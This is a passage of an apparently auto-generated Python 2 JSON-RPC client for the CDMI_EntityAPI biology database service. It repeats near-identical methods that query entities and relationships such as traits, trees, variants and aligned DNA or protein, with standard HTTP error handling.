se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Trait(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Trait',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Trait(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Trait',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Tree(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Tree',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Tree(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Tree',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Tree(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Tree',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TreeAttribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TreeAttribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TreeAttribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TreeAttribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TreeAttribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TreeAttribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TreeNodeAttribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TreeNodeAttribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TreeNodeAttribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TreeNodeAttribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TreeNodeAttribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TreeNodeAttribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Variant(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Variant',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Variant(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Variant',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Variant(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Variant',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AffectsLevelOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AffectsLevelOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAffectedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAffectedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Aligned(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Aligned',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasAlignedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasAlignedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssertsFunctionFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssertsFunctionFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAssertedFunctionFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAssertedFunctionFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssociationFeature(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssociationFeature',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_FeatureInteractsIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_FeatureInteractsIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_CompoundMeasuredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_CompoundMeasuredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_MeasuresCompound(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_MeasuresCompound',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Concerns(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Concerns',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsATopicOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsATopicOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ConsistsOfCompounds(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ConsistsOfCompounds',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Contains(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Contains',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsContainedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsContainedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ContainsAlignedDNA(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ContainsAlignedDNA',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAlignedDNAComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAlignedDNAComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ContainsAlignedProtein(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ContainsAlignedProtein',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAlignedProteinComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAlignedProteinComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
